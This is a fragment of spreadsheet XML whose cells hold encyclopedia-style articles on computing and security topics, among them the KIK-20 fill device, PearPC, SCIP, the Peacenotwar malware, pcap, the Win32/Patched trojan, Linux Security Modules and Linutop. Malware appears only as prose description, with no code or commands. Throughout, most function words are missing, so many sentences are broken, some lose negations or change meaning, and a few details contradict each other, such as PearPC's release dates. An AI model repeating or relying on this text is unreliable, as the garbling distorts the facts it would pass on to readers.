    <t>kik-20 secure dtd2000 system (sds) fill device developed sypris electronics, florida, auspices u.s. national security agency. along an/pyq-10, intended eventually replace an/cyz-10 fill device, along older units still service, support wide variety cryptographic devices types. roughly size cyz-10 7.4" (188mm) 4.25" (108) 1.8" (46mm) weighs less (1.1 kg). uses xscale processor running microsoft windows operating system. cryptographic functions performed internal kov-21 crypto card. includes ram, flash read-only memory, qwerty keyboard, half-vga color display, port. also 6-pin connector cabling standard fill connectors. keyboard includes zeroize buttons. costs us$3700 each. sources</t>
  </si>
  <si>
    <t>PearPC</t>
  </si>
  <si>
    <t>pearpc architecture-independent powerpc platform emulator capable running many powerpc operating systems, including pre-intel versions darwin linux. released terms general public license (gpl). executed microsoft windows, linux, freebsd systems based posix-x11. first official release made 2004.the emulator features just-in-time (jit) processor emulation core dynamically translates code code, caching results. despite running host architectures, emulation core runs least times fast architecture-independent generic processor emulation core. however, according pages supplied debian's packages pearpc, even core runs around times slower host machine would executing native code.until december 2005 pearpc advanced quickly speed, stability, features. after time, however, release july 2011 five half years later. individuals also working builds features native cd-rom support even progress emulating sound begun. builds including altivec emulation applications require powerpc processor also produced, although numerous problems (mainly interface glitches) running tiger using builds resolved. support graphics acceleration also worked theory provide major performance boost hardware-accelerated known quartz extreme currently supported pearpc. shortcomings current official version pearpc 0.5.0 (released july 2015). while powerpc emulation handles applications emulator already impressive feature set, project still lacks features needed complete emulation powerpc experience: sound emulation (there pearpc sound-test builds web, usually called ppc-snd) (64-bit powerpc) emulation apple disk image (.dmg) support image (currently, .dmg image file must converted image (.iso) leopard support (instead, using osx86)on june 2005, apple's (then) ceo, steve jobs, announced apple would begin switching computers' architectures ibm's powerpc intel's platform. transition completed august 2006. news raised questions future pearpc project although project powerpc emulator, used primarily machines. natively platform, including non-apple computers (albeit contravention license agreement), interest pearpc waned since, attention largely centers running natively hardware virtualization software vmware workstation. frontends pearpc currently lacks 'change button found early versions eliminated rarely functioned correctly. however, developers made frontends program. peargui, looks like application incompatible current versions pearpc, pearpccp (short "pearpc control panel"), compatible pearpc newer. peargui's incompleteness annoys many users 'create disk image' feature complete severe shortcoming), many users praised gui. pearpccp built-in configuration wizard addition advanced features hindered many users believe inferior interface several bugs. some users also report pearpccp removes comments configuration files, peargui not. pearpc.net website also released java-based pearpc-gui, called ape, part pearpc.net package. cherryos alleged simply front-end pearpc. website shut 2005. cherryos controversy within five months pearpc's release, another powerpc emulator called cherryos appeared, claiming offer features greater speed. however, within hours announcement, questions raised claims, many experts open-source advocates suggesting cherryos nothing repackaging pearpc. cherryos emulator re-released march 2005 commercial product. according cassondra foesch, principal author pearpc, still contained part code written pearpc project. cherryos also created questions regarding legality commercial software developed marketed specifically purpose running architecture, since apple's license agreement specifically states operating system installed apple-labeled computers. eventually, distribution cherryos ceased high amount criticism directed it.in addition, although cherryos supports native cd-rom installation, emulator runs slower pearpc does, even though claims three times faster pearpc. emulated hardware cpu: powerpc powerpc g4ethernet: 3com 3c905c realtek 8139 also comparison platform virtualization software references notes external links pearpc sourceforge pearpc.net, community-run pearpc site pearpc forum pearpc windows setup guide</t>
  </si>
  <si>
    <t>Lightweight Portable Security</t>
  </si>
  <si>
    <t>lightweight portable security (lps) linux livecd liveusb) distribution, developed publicly distributed united states department defense’s force research laboratory, designed serve secure node. force research laboratory actively maintained successor, trusted node security (tens) 2007 2021. almost x86_64 computer mac). boots ram, creating pristine, non-persistent node. supports dod-approved common access card (cac) readers, required authenticating users pki-authenticated gateways access internal networks.lps turns untrusted system (such home computer) trusted network client. trace work activity malware) written local computer's hard drive. september 2011 (version 1.2.5), public distribution includes smart card-enabled firefox browser supporting dod's personal identity verification (piv) cards, text viewer, java, file browser, remote desktop software (citrix, microsoft vmware view), client, public edition encryption wizard ability flash drives. public deluxe version also available adds libreoffice adobe reader software. history encryption wizard initiated force research laboratory's anti-tamper software protection initiative program, started 2001. 2016, program ending, encryption wizard moved trusted node security program office. lps, version rebranded trusted node security, tens. encryption wizard retained name, received tens logo version 3.4.11.in 2020, covid-19 pandemic increase remote work. national security agency recommended u.s. government employees working remotely government furnished computers. however, necessary employee home computer, national security agency recommended tens measure individual employee could make computer secure.in 2021, tens became compatible uefi secure boot. uefi secure boot used protect operating system installed computer's hard drive. june 2020, uefi secure boot available many newer pcs. uefi secure boot would prevent older versions tens booting.in august 2021, tens site announced tens program office decommissioned. defense information systems agency longer willing fund program. agency agreed champion program. "potentially final" editions tens encryption wizard released april 2021. encryption wizard came encryption wizard (ew), simple, strong file folder encryptor protection sensitive unclassified information (fouo, privacy act, cui, etc.). written java, encrypted file types data rest data transit protection. without installation elevated privileges, windows, mac, linux, solaris, computers support java software platform. with simple drag drop interface, offered 128-bit 256-bit encryption, sha-256 hashing, signatures, searchable metadata, archives, compression, secure deleting, pki/cac/piv support. encryption could keyed passphrase certificate. gots—u.s. government invented, owned, supported software—and came three versions, public version uses standard java cryptographic library, unified version uses fip-140-2 certified crypto licensed legion bouncy castle, government-only version uses fips-140-2 certified crypto stack licensed security. three versions interoperate. public https access general public difficulty accessing tens sites, time time, department defense sites used security settings somewhat different common practice. result, users configure browsers particular order obtain tens. circa 2020, main difference sites implement https using department defense certificate authority rather commonly accepted certificate authorities. because difficulties department defense servers, tens program office established commercially hosted site http://www.gettens.online/ instructions configure browser work official tens site. this article incorporates text department defense site. also xfce lightweight linux distribution references references trusted node security program office refer trusted node security program office, information directorate, force research laboratories, united states force. references software protection initiative refer anti-tamper program, sensors directorate, force research laboratories, united states force. external links trusted node security wayback machine (archived august 2021). home page tens program office.</t>
  </si>
  <si>
    <t>Limbo (programming language)</t>
  </si>
  <si>
    <t>limbo programming language writing distributed systems language used write applications inferno operating system. designed bell labs sean dorward, phil winterbottom, pike.the limbo compiler generates architecture-independent object code interpreted virtual machine compiled runtime improve performance. therefore limbo applications completely portable across inferno platforms. limbo's approach concurrency inspired hoare's communicating sequential processes (csp), implemented amended pike's earlier newsqueak language winterbottom's alef. language features limbo supports following features: modular programming concurrent programming strong type checking compile run-time interprocess communication typed channels automatic garbage collection simple abstract data types virtual machine virtual machine executes limbo code cisc-like instructions arithmetic, control flow, data motion, process creation, synchronizing communicating processes, loading modules code, support higher-level data-types: strings, arrays, lists, communication channels. uses hybrid reference counting real-time garbage-collector cyclic data.aspects design inspired at&amp;t hobbit microprocessor, used original bebox. examples limbo uses ada-style definitions hello world books edition inferno operating system limbo programming language described textbook inferno programming limbo isbn 0-470-84352-7 (chichester: john wiley sons, 2003), phillip stanley-marbell. another textbook inferno programming book: introduction programming inferno distributed system, martin atkins, charles forsyth, pike howard trickey, started, never released. also inferno operating system alef, predecessor limbo plan bell labs (programming language), similar language google at&amp;t hobbit, processor architecture inspired references external links vita nuova page limbo descent limbo brian kernighan limbo programming language dennis ritchie addendum vita nuova. inferno programming limbo phillip stanley-marbell threaded programming bell labs style source code design inferno virtual machine, vita nuova. "dis design", inferno (4th ed.), "dis specification", inferno (4th ed.),</t>
  </si>
  <si>
    <t>Secure Communications Interoperability Protocol</t>
  </si>
  <si>
    <t>secure communications interoperability protocol (scip) standard secure voice data communication, circuit-switched one-to-one connections, packet-switched networks. scip derived government future narrowband digital terminal (fnbdt) project. scip supports number different modes, including national multinational modes employ different cryptography. many nations industries develop scip devices support multinational national modes scip. scip operate wide variety communications systems, including commercial land line telephone, military radios, communication satellites, voice several different cellular telephone standards. therefore, designed make assumptions underlying channel minimum bandwidth 2400 similar dial-up modem connection made, scip phones first negotiate parameters need communicate best possible. scip fnbdt systems used since 2001, beginning condor secure cell phone. standard designed cover wideband well narrowband voice data security. scip designed department defense digital voice processor consortium (ddvpc) cooperation u.s. national security agency intended solve problems earlier encryption systems voice, including stu-iii secure terminal equipment (ste) made assumptions underlying communication systems prevented interoperability modern wireless systems. sets upgraded work scip, stu-iii cannot. this resistance since various government agencies already 350,000 stu-iii telephones cost several thousand dollars each. there several components scip standard: management, voice compression, encryption signalling plan voice, data multimedia applications. management (120) secure call, traffic encryption (tek) must negotiated. type security (classified calls), scip signalling plan uses enhanced firefly messaging system exchange. firefly management system based public cryptography. least commercial grade implementation uses diffie-hellman exchange. stes security tokens limit secure voice capability authorized users scip devices require code, digits type security, digits unclassified. voice compression using voice coders (vocoders) scip work variety vocoders. standard requires, minimum, support mixed-excitation linear prediction (melp) coder, enhanced melp algorithm known melpe, additional preprocessing, analyzer synthesizer capabilities improved intelligibility noise robustness. melp melpe interoperable operate 2400 bit/s, sending data frame every 22.5 milliseconds melpe optional additional rates 1200 bit/s bit/s. 2400 bit/s melpe mandatory voice coder required scip. other voice coders supported terminals. these used terminals involved call support coder (agreed negotiation stage call setup) network support required throughput. g.729d widely supported non-mandatory voice coder scip terminals offers good compromise higher voice quality without dramatically increasing required throughput. encryption (scip 23x) security used multinational national modes scip defined scip family documents. scip defines based cryptography used multinationally. scip defines alternate multinational cryptographic solution. several nations defined, defining, national security modes scip. national mode (scip 230) scip defines cryptography national mode scip. rest section refers scip 230. security, scip uses block cipher operating counter mode. traffic encryption (tek) negotiated call. block cipher 64-bit state vector (sv) input. cipher's block size longer bits, fixed filler added. output block cipher xored melp data frames create cipher text transmitted. low-order bits state vector reserved applications data frame longer block cipher output. next bits counter. four bits used represent transmission mode. this allows mode, e.g. voice data, operate time tek. high-order bits sender this allows multiple senders single channel tek. note since overall scip encryption effectively stream cipher, essential state vector value never used twice given tek. melp data rates, 42-bit counter allows call three thousand years long encryption repeats. type security, scip uses baton, 128-bit block design. with 128-bit ciphers, aes, scip specifies data frames encrypted cipher output bloc, first beginning second (i.e. next byte boundary). least commercial grade implementation uses triple cipher. signalling plan (210) scip signalling plan common national multinational modes scip. scip mandatory types transmission. mandatory data service uses protocol forward error correction (fec) ensure reliable transmission. receiving station acknowledges accurate receipt data blocks block re-transmitted, necessary. voice, scip simply sends stream voice data frames (typically melpe frames, possibly g.729d another codec negotiated terminals). save power voice calls, scip stops sending speech input. synchronization block sent roughly twice second place data frame. order bits encryption counter sent every sync block. bits enough cover fade minutes. part rest state vector sent well receipt three sync blocks, entire state vector recovered. this handles longer fades allows station proper join multi station synchronized within seconds. availability march 2011 range scip documents, including scip-210 signalling standard, publicly available website.prior this, scip specifications widely diffused easily accessible. this made protocol government rather "opaque" outside governments defense industries. public implementation type security transport protocols available, precluding security publicly verified. also secure voice zrtp melp melpe cvsd celp lpc-10e fs1015 fs1016 andvt secure terminal equipment omni/omni sectéra secure voice family notes references securing wireless environment (fnbdt), briefing available http://wireless.securephone.net/ secure communications interoperability protocols, scip, hfia briefing available https://web.archive.org/web/20060530160027/http://www.hfindustry.com/sept05/sept2005_presentations/hfiabriefing.ppt</t>
  </si>
  <si>
    <t>Peacenotwar</t>
  </si>
  <si>
    <t>peacenotwar piece malware created brandon nozaki miller. march 2022, added dependency update node-ipc, common javascript dependency. background between march march 2022, brandon nozaki miller, maintainer node-ipc package package registry, released updates containing malicious code targeting systems russia belarus (cve-2022-23812). week later, miller added peacenotwar module dependency node-ipc. function peacenotwar create text file titled with-love-from-america.txt desktop affected machines, containing message protest russo-ukrainian war. impact because node-ipc common software dependency, compromised several projects relied upon it.among affected projects known vue.js, required node-ipc dependency specify version. some users vue.js become affected dependency fetched specific packages. unity also affected, patch issued release. also malware hacktivism reactions 2022 russian invasion ukraine references</t>
  </si>
  <si>
    <t>Pcap</t>
  </si>
  <si>
    <t>field computer network administration, pcap application programming interface (api) capturing network traffic. while name abbreviation packet capture, api's proper name. unix-like systems implement pcap libpcap library; windows, port libpcap named winpcap longer supported developed, port named npcap windows later still supported. monitoring software libpcap, winpcap, npcap capture network packets traveling computer network and, newer versions, transmit packets network link layer, list network interfaces possible libpcap, winpcap, npcap. pcap written languages java, .net languages, scripting languages generally wrapper; wrappers provided libpcap winpcap itself. programs link directly object-oriented wrapper. features libpcap, winpcap, npcap provide packet-capture filtering engines many open-source commercial network tools, including protocol analyzers (packet sniffers), network monitors, network intrusion detection systems, traffic-generators network-testers. libpcap, winpcap, npcap also support saving captured packets file, reading files containing saved packets; applications written, using libpcap, winpcap, npcap, able capture network traffic analyze read saved capture analyze using analysis code. capture file saved format libpcap, winpcap, npcap read applications understand format, tcpdump, wireshark, netmaster, microsoft network monitor 3.x. mime type file format created read libpcap, winpcap, npcap application/vnd.tcpdump.pcap. typical file extension .pcap, although .cap .dmp also common use. history libpcap originally developed tcpdump developers network research group lawrence berkeley laboratory. low-level packet capture, capture file reading, capture file writing code tcpdump extracted made library, tcpdump linked. developed tcpdump.org group develops tcpdump. pcap libraries windows while libpcap originally developed unix-like operating systems, successful port windows made, called winpcap. unmaintained since 2013, several competing forks released features support newer versions windows. winpcap winpcap consists x86-64 drivers windows family (windows 4.0, 2000, server 2003, vista, 10), network driver interface specification (ndis) read packets directly network adapter; implementations lower-level library listed operating systems, communicate drivers; port libpcap uses offered low-level library implementations.programmers politecnico torino wrote original code; 2008 cace technologies, company winpcap developers, developed maintained product. cace acquired riverbed technology october 2010.because winpcap uses older ndis apis, work builds windows deprecated removed apis favor newer ndis apis. also forces limitations unable capture 802.1q vlan tags ethernet headers. winpcap project ceased development winpcap windump longer maintained. last official winpcap release 4.1.3 released march 2013. npcap npcap nmap project's packet sniffing library windows. based winpcap, written make windows networking improvements ndis version authors rewrote winpcap ndis protocol driver light-weight filter (lwf) driver, change reduces processing overhead. npcap maintenance releases updated version included libpcap library latest available, allowing software authors newer features linux software already supported. most software used winpcap easily ported npcap minimal changes.npcap introduced several innovations available winpcap: npcap restricted administrators sniff packets. npcap able sniff inject loopback packets (transmissions services machine) using windows filtering platform. npcap capture 802.11 wifi frames variety commonly-available network adapters. win10pcap win10pcap implementation also based ndis driver model works stably windows 10.as 2020, project however inactive since 2016. programs libpcap apache drill, open source engine interactive analysis large scale datasets. bit-twist, libpcap-based ethernet packet generator editor bsd, linux, windows. cain abel, password recovery tool microsoft windows etherape, graphical tool monitoring network traffic bandwidth usage real time. firesheep, extension firefox browser captures packets performs session hijacking iftop, tool displaying bandwidth usage (like network traffic) kismet, 802.11 wireless lans l0phtcrack, password auditing recovery application. mcafee epolicy orchestrator, rogue system detection feature ngrep, "network grep", isolate strings packets, show packet data human-friendly output. nmap, port-scanning fingerprinting network utility pirni, network security tool jailbroken devices. scapy, packet manipulation tool computer networks, written python philippe biondi. snort, network-intrusion-detection system. suricata, network intrusion prevention analysis platform. symantec data loss prevention, used monitor identify sensitive data, track use, location. data loss policies allow sensitive data blocked leaving network copied another device. tcpdump, tool capturing dumping packets analysis, windump, windows port tcpdump. network monitoring platform. snooper, locate urls audio video files order allow recording them. whatpulse, statistical (input, network, uptime) measuring application. wireshark (formerly ethereal), graphical packet-capture protocol-analysis tool. xlink software allows various console games played online xplico, network forensics analysis tool (nfat). wrapper libraries libpcap c++: libtins, libcrafter, pcapplusplus perl: net::pcap python: python-libpcap, pcapy, winpcapy ruby: packetfu rust: pcap tcl: tclpcap, tcap, pktsrc java: jpcap, jnetpcap, jpcap, pcap4j, jxnet .net: winpcapnet, sharppcap, pcap.net haskell: pcap ocaml: mlpcap chicken scheme: pcap common lisp: plokami racket: speacap pcap andreas krennmair, pcap fork previous miek gieben, pcap developed part gopacket package erlang: epcap node.js: node_pcap non-pcap code reads pcap files python: pycapfile python: pypcapkit references external links official website, libpcap, tcpdump official website, npcap official website, winpcap, windump list publicly available pcap files</t>
  </si>
  <si>
    <t>Patched (malware)</t>
  </si>
  <si>
    <t>win32/patched computer trojan targeting microsoft windows operating system first detected october 2008. files detected "trojan.win32.patched" usually windows components patched malicious application. purpose patching varies. example, certain malware patches system components order disable security, windows safe file check feature. other malware parts code system component patch certain functions original file point appended code. operation this trojan operates modification legitimate systems files infected system. additionally, malware parts code system component patch certain functions original file point appended code. frequently patched components are: winlogon.exe wininet.dll kernel32.dll iexplore.exe services.exe. initial infection variant replaces original legitimate system file "sfc.dll" patched version. original "sfc.dll" moved malware another location within computer. trojan:win32/patched.r capable loading files. installed malware. variant represent malicious, packed, win32 programs. many malicious programs packed particular utilities attempt avoid detection. variant defines corrupted files modified load additional dll. this variant also attack corrupt services.exe executable variant modify legitimate file infected system. symptoms there obvious symptoms indicate presence malware affected machine. additionally, common symptoms associated threat. alert notifications installed antivirus software symptom(s). removal detection advised delete, rename quarantine patched windows components affect system stability. even though windows locks main files active, might still possible affect them. user's anti-virus software detected certain file trojan.win32.patched, could attempt create copy patched file, restore contents, renaming command windows registry order replace patched file cleaned next windows startup. restoration recent system restore points advisable. many cases patched system component replaced clean one. before restoring system restore point advised back personal data avoid losing windows rolls back previously saved state. windows installation discs contain repair option replace patched file. another course action includes attaching hard drive patched file slave similar windows-based system, boot replace patched file file taken clean system. references</t>
  </si>
  <si>
    <t>Payload (computing)</t>
  </si>
  <si>
    <t>computing telecommunications, payload part transmitted data actual intended message. headers metadata sent enable payload delivery.in context computer virus worm, payload portion malware performs malicious action. term borrowed transportation, payload refers part load pays transportation. networking computer networking, data transmitted payload. almost always encapsulated type frame format, composed framing bits frame check sequence. examples ethernet frames, point-to-point protocol (ppp) frames, fibre channel frames, v.42 modem frames. programming computer programming, common usage term context message protocols, differentiate protocol overhead actual data. example, json service response might "data": "message": "hello, world!" string hello, world! payload json message, rest protocol overhead. security computer security, payload part private user text could also contain malware worms viruses performs malicious action; deleting data, sending spam encrypting data. addition payload, malware also typically overhead code aimed simply spreading itself, avoiding detection. also protocol data unit unit information transmitted computer network service data unit data passed lower layer model, encapsulated references</t>
  </si>
  <si>
    <t>Linux Intrusion Detection System</t>
  </si>
  <si>
    <t>computer security, linux intrusion detection system (lids) patch linux kernel associated administrative tools enhances kernel's security implementing mandatory access control (mac). when lids effect system network administration operations, chosen file access, capability use, device, memory, access made impossible, even root. define programs access specific files. uses extends system capabilities bounding control whole system adds network filesystem security features kernel enhance security. finely tune security protections online, hide sensitive processes, receive security alerts network, more. lids currently supports linux kernel 2.6, 2.4. lids released terms general public license (gpl). current status 2013, project appears dead. last updates homepage associated forum 2010, 2018 website longer running. awards security tools 2003 security tools 2000 best linux october 2000 also apparmor security-enhanced linux (selinux) references external links lids homepage (archive)</t>
  </si>
  <si>
    <t>Linux Malware Detect</t>
  </si>
  <si>
    <t>linux malware detect, abbreviated maldet, software package looks malware linux systems reports details linux secure microsoft windows considerably fewer computer viruses malware written whereas many malware detection software packages like virus scanners windows, relatively linux.to protect linux systems vulnerabilities, various software packages available, rootkit detectors rootkit hunter chkrootkit, auditing systems like lynis. malware detection software clamav improve security systems scanning based signatures thousands instances known malware. malware signatures, uses various sources signatures database clamav malware hash registry team cymru. besides third party signature databases, also maintains database signatures. clamav scanner engine already available system, scanner engine. this normally give better performance built-in scanner engine.lmd quarantine malware, clean software contains malicious code.the executable command maldet. typical command invocations maldet check later versions; maldet check malware signature updates; maldet scan file system server resides. checking malware signature updates typically done automated manner. besides periodic scans, real-time monitoring also supported --monitor command-line argument. monitor users, paths files way.linux malware detect objectives certification. references external links r-fx networks project page</t>
  </si>
  <si>
    <t>Linux PAM</t>
  </si>
  <si>
    <t>linux pluggable authentication modules (pam) suite libraries allows linux system administrator configure methods authenticate users. provides flexible centralized switch authentication methods secured applications using configuration files instead changing application code. there linux libraries allowing authentication using methods local passwords, ldap, fingerprint readers. linux evolved unix pluggable authentication modules architecture.linux-pam separates tasks authentication four independent management groups: account modules check specified account valid authentication target current conditions. this include conditions like account expiration, time day, user access requested service. authentication modules verify user's identity, example requesting checking password secret. they also pass authentication information systems like keyring. password modules responsible updating passwords, generally coupled modules employed authentication step. they also used enforce strong passwords. session modules define actions performed beginning sessions. session starts user successfully authenticated. also pluggable authentication modules openpam references external links primary distribution site linux-pam project development site linux-pam project understanding pam, a.p. lawrence linux modules, mokhtar ebrahim</t>
  </si>
  <si>
    <t>QVD (software)</t>
  </si>
  <si>
    <t>open-source virtual desktop infrastructure (vdi) product built linux. main purpose provide remote desktops users. features support linux desktop runs x11; includes gnome, kde, xfce lxde desktops. clients available windows, linux, macos android. main focus provide desktop access large number users small footprint user session using image users (using overlays) sharing memory user processes using bandwidththe server software single-node configuration multi-node configuration. case latter, user sessions virtual machines) automatically distributed along running nodes. software able recover automatically case node failing, redistributing user sessions remaining nodes. several back-ends available authentication ones independently developed plugins. libraries used reduce network traffic resulting bandwidth requirements common corporate desktop usage, e.g. browsing web, handling email, editing documents. virtual machines using lxc. allows complete isolation host guest virtual machines. hand, runs virtual machined inside isolated containers inside host. that greatly reduces memory requirements user session kernel able share resources (i.e. disk buffers) containers effectively. administration platform performed using provided command line utilities. provisioning users automated. structure composed actors components. qvd's actors are: users, identified logins passwords virtual machines: running linux desktops owned users, runs virtual machine linux nodes. nodes: physical servers images: templates shared properties applications installed, memory space user's homethe components are: qvd-client: client software connects displays user's desktop server. currently clients windows, linux, (beta), android. qvd-l7r: level router. charge balance connections qvd-client virtual machines responsibility login user went virtual machines. qvd-hkd: house keeping daemon. responsible interact virtual machines, starting, stopping, update vm's status database. currently supports virtualization models. qvd-database: holds status users, virtual machines, images, hosts. platform information stored database. qvd-administrative tools: composed (web administration tool) provides easy simple administrate whole platform, couple nodes hundreds. qvd-vma: agent runs virtual machine, allowing users connect, enable printer sharing, audio, hooks, etc. history 1.x, versions product based freenx tailored specific client never publicly released. released 2011. main features were: able provide linux remote desktops users. supported ubuntu linux. used hypervisor. connection protocol http-based ssl. libraries used reduce bandwidth usage. bidirectional audio. multi-node support. released october 2012. main addition version support linux containers. that made possible reduce memory requirements user session. other features version were: versioning system guess operating system images. support suse linux enterprise edition (sles) platform. released december 2012. main additions release follows: support btrfs storage back-end. support private communication channel client could used extensions. i.e. support serial port redirections vpn. better cluster support, reducing recovery times host network failures. released january 2014. main additions release follows: shared folders show folders user's remote desktop expiration images release versions user's desktop client shadow sessions order provide support user. released january 2015. main additions release follows: removed standalone component, launched required. client internationalization overlayfs default union mount filesystem parse dates using local time zone improved debugging capabilities released january 2016. main additions release follows: complete renovated interface multi-administrator support multi-language (english spanish) customized views complete documentation, including step-by-step guides improvement image downloads disk image management property management visualization disk image blocking/unblocking tactical view statistics graphs updated real time relevant system information: multi-tenant management embedded views related elements style customization released september 2018. main additions release follows: user portal html client generic printing driver performance improvements totp authentication plugin (time-based one-time password) improvements (web administration tool) passing environment variables client authentication plugins released october 2020. main additions releas follows: usbip linux client. also technology kernel-based virtual machine references external links official website</t>
  </si>
  <si>
    <t>Linux Router Project</t>
  </si>
  <si>
    <t>linux router project (lrp) defunct networking-centric micro linux distribution. released versions small enough single 1.44mb floppy disk, made building maintaining routers, access servers, thin servers, thin clients, network appliances, typically embedded systems next trivial. history conceived primarily developed dave cinege 1997 2002. began originally 'router floppy' evolved streamlined general purpose network operating system.as oldest embedded linux distribution, formed whole part) basis many embedded system distributions commercial products followed several parts developed specifically enhanced still found common usage today posixness busybox. pioneering features small base footprint simplified packaging system menu based system package configuration strict separation volatile, non-volatile, read only, read/write areas root hierarchy unpacked ramdisk directly flash system commit configuration changes non-volatile medium (disk/flash) unreleased work dave cinege worked version rewrite late 2000 january 2001. began testing ideas proof concept code, claimed radical departure status quo. surprise, direction seemed ideal, prompting abandon work done begin scratch named 5.0. development headed towards complete rewrite reimplementation linux userland standard design outside posix specification. stated purpose provide modern standard base operating system suitable application including embedded systems, appliances, servers, desktop computers. cinege however stopped work several months later financial reasons. refused release work, even name animosity towards computer industry perceived plundering open source authors' work large corporations. 2003 cinege updated website reflect project abandoned. proposed features base size shell scripting language unrelated bourne shell packaging scheme would retrofit oses application management system core process management system references external links linux journal article linux router comparison cisco routers</t>
  </si>
  <si>
    <t>Linux Security Modules</t>
  </si>
  <si>
    <t>linux security modules (lsm) framework allowing linux kernel support without bias variety computer security models. licensed terms general public license standard part linux kernel since linux 2.6. apparmor, selinux, smack, tomoyo linux currently approved security modules official kernel. design designed order answer requirements successfully implementing mandatory access control module, imposing fewest possible changes linux kernel. avoids approach system call interposition used systrace scale multiprocessor kernels subject tocttou (race) attacks. instead, inserts "hooks" (upcalls module) every point kernel user-level system-call result access important internal kernel-object like inodes task control blocks. narrowly scoped solve problem access control, imposing large complex change-patch mainstream kernel. intended general "hook" "upcall" mechanism, support operating system-level virtualization. lsm's access-control goal closely related problem system auditing, subtly different. auditing requires every attempt access recorded. cannot deliver this, would require great many hooks, order detect cases kernel "short circuits" failing system-calls returns error code getting near significant objects. design described paper linux security modules: general security support linux kernel presented usenix security 2002. conference paper using cqual static analysis authorization hook placement studied automatic static analysis kernel code verify necessary hooks actually inserted linux kernel. adoption apparmor selinux smack tomoyo landlock history 2001 linux kernel summit, proposed selinux included linux 2.5. linus torvalds rejected selinux time, observed many different security projects development, since differ, security community formed consensus ultimate security model. instead, linus charged security community "make module". response, crispin cowan proposed lsm: interface linux kernel provides sufficient "hooks" (upcalls) within linux kernel loadable module allow module enforce mandatory access controls. development next years conducted community, including substantial contributions immunix corporation, nsa, mcafee, ibm, silicon graphics, many independent contributors. ultimately accepted linux kernel mainstream included standard part linux december 2003. 2006, kernel developers observed selinux widely used module included mainstream linux kernel source tree. widely used module, reasoned, indirection unnecessary, removed replaced selinux itself. however, modules maintained outside mainstream kernel tree (apparmor, linux intrusion detection system, fireflier, cipso, multi adm, etc.), argument results: developers modules started putting effort upstreaming respective modules, 2006 kernel summit, linus asserted would stay want arbitrate best security model. likely remain since additional security modules smack (version 2.6.25), tomoyo linux (version 2.6.30, june 2009) apparmor (version 2.6.36) accepted mainline kernel. references external links "source code project statistics". archived original 2005-03-07. retrieved 2006-02-08. sysadmin magazine article secure levels security projects based linux kernel</t>
  </si>
  <si>
    <t>PathPing</t>
  </si>
  <si>
    <t>pathping command command-line network utility supplied windows 2000 beyond combines functionality ping tracert. used locate spots network latency network loss. overview command provides details path hosts ping-like statistics node path based samples taken time period, depending many nodes start host. advantages pathping ping traceroute node pinged result single command, behavior nodes studied extended time period, rather default ping sample four messages default traceroute single route trace. disadvantage takes total seconds show ping statistics. syntax command-syntax pathping host-list] maximum_hops] address] [-n] period] num_queries] timeout] [-p] [-r] [-t] [-4] [-6] target_name options: host-list loose source route along host-list. maximum_hops maximum number hops search target. address specified source address. resolve addresses hostnames. period wait period milliseconds pings. num_queries number queries hop. timeout wait timeout milliseconds reply. test rsvp path connectivity. test rsvp aware. test connectivity layer-2 priority tags. force using ipv4. force using ipv6. sample &gt;pathping wikipedia.org tracing route wikipedia.org [66.230.200.100] maximum hops: aaron.hsd1.mn.comcast.net. [192.168.11.3] air.setup [192.168.11.1] 73.127.68.1 ge-1-38-ur01.minnetonka.mn.minn.comcast.net [68.86.234.41] 68.86.232.37 68.86.232.33 68.86.232.5 68.86.232.1 12.116.99.41 tbr2.cgcil.ip.att.net [12.122.99.70] ggr2.cgcil.ip.att.net [12.123.6.69] ar1-a3120s2.wswdc.ip.att.net [192.205.34.6] 66.192.247.163 ge8-13.csw5-pmtpa.wikimedia.org [66.193.50.242] rr.pmtpa.wikimedia.org [66.230.200.100] computing statistics seconds... source here this node/link lost/sent lost/sent address aaron.hsd1.mn.comcast.net. [192.168.11.3] air.setup [192.168.11.1] 73.127.68.1 ge-1-38-ur01.minnetonka.mn.minn.comcast.net [68.86.234.41] 68.86.232.37 68.86.232.33 12ms 68.86.232.5 68.86.232.1 20ms 12.116.99.41 =100% =100% tbr2.cgcil.ip.att.net [12.122.99.70] =100% =100% ggr2.cgcil.ip.att.net [12.123.6.69] =100% =100% ar1-a3120s2.wswdc.ip.att.net [192.205.34.6] =100% =100% 66.192.247.163 63ms ge8-13.csw5-pmtpa.wikimedia.org [66.193.50.242] 63ms rr.pmtpa.wikimedia.org [66.230.200.100] trace complete. also ping (networking utility) traceroute software combines functionality traceroute ping layer four traceroute modern traceroute network tracing) implementation supports multitude layer-4 protocols notes references further reading robert cowart; brian knittel (2002). special edition using windows home edition, bestseller edition. publishing. isbn 978-0789728517. john paul mueller (2007). windows administration command line windows vista, windows 2003, windows windows 2000. john wiley sons. isbn 978-0470165799. external links pathping microsoft docs information pathping tool (microsoft.com) winmtr</t>
  </si>
  <si>
    <t>Linutop</t>
  </si>
  <si>
    <t>linutop small, light, environmentally friendly nettop computer containing metal case moving parts, runs linutop customized version linux based xubuntu ubuntu/xfce distribution). linutop kiosk software linutop server offer full digital signage solution. variety applications oriented towards secure browsing digital signage available operating system. linutop multimedia-capable offers line-out/mic-in sound. device configured easily ltsp thin client. linutop suited internet cafés, public libraries schools. history linutop first device based thincan reference design estonian company artec group. linutop february 2008, company unveiled linutop based a603 mini (like works everywhere appliance). linutop stronger geode processor memory, allowing openoffice.org. flash memory storage. hardware specifications linutop linutop smallest computer offered linutop. small size, absence making silent, often hidden behind dynamic display screens professionals. compact linutop comes small aluminum case dimensions 0,8in weight grams power consumption watts. board, processor running mhz, flash memory. connectors: hdmi, mini-jack audio, rj-45 ethernet, four 2.0, 5-volt micro power. linutop professional packaging raspberry incorporates 1080p video hardware accelerator. with compact configuration, designed fields education, transport, trade health dissemination information. linutop linutop powerful linutop. linutop microcomputer form small fanless metal case dimensions (3,7 1,4in weight grams energy consumption watts. board, intel atom x5-z8350 processor, 16gb flash memory. connectors: hdmi, rj-45 ethernet, four 2.0, 5-volt power supply. with configuration, linutop computer targets varied compactness power required. linutop linutop kiosk linutop kiosk software linutop allows easily configure: secure internet access point. dynamic display, multi-format (photos, videos, mp3, pages, music, ...) linutop 14.04 linutop 14.04 based xubuntu xfce contains features designed business cases: firefox libre office terminal server client, viewer, paint, mirage, archive manager, vnc, gedit, samba internet kiosk full screen, toolbar management, white/blacklist management. display kiosk user define playlist loop urls, photos, video configuration panel allows user "lock" configuration, backup restore bootable key. size key, hard drive flash memory minimum requirements piii mhz, 512mb linutop raspberry linutop based raspbian xfce contains features designed business cases: epiphany browser, libre office (with hardware acceleration), terminal server client, viewer, paint, mirage, archive manager, vnc, 